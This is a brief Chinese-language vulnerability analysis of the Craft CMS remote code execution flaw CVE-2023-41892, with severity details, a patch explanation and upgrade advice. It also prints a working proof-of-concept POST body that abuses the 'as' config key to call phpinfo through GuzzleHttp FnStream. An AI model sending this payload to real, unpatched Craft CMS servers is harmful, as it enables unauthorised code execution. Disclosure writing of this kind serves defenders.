本文主要是介绍漏洞分析|Craft CMS 远程代码执行漏洞 (CVE-2023-41892),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
**
1.概述
Pixel&tonic Craft CMS 是美国 Pixel&tonic 公司的一套内容管理系统(CMS)。在 4.4.15 之前的版本中,存在一个远程代码执行漏洞。Craft CMS 是一个用于创建数字体验的平台,这是一个高影响、低复杂性的攻击向量。
2.详细描述
受影响的 Craft CMS 版本存在代码注入漏洞,该漏洞源于远程代码执行漏洞。为了缓解此问题,建议运行 4.4.15 之前版本的用户至少更新到 4.4.15 版本。此问题已在 Craft CMS 4.4.15 中得到修复。
漏洞严重性
CVSS 3.x 严重性和指标:NIST: NVD向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
漏洞类型CWE-94
不当控制代码生成(‘代码注入’)
影响范围参考
简单分析
补丁过滤了config参数
将as和on特殊字符过滤了
Poc的post字段
action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","asxyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
使用as重置函数到我们指定的函数中导致代码执行
修复和建议用户
应更新至 Craft CMS 4.4.15 或更高版本以缓解此问题。
这篇关于漏洞分析|Craft CMS 远程代码执行漏洞 (CVE-2023-41892)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
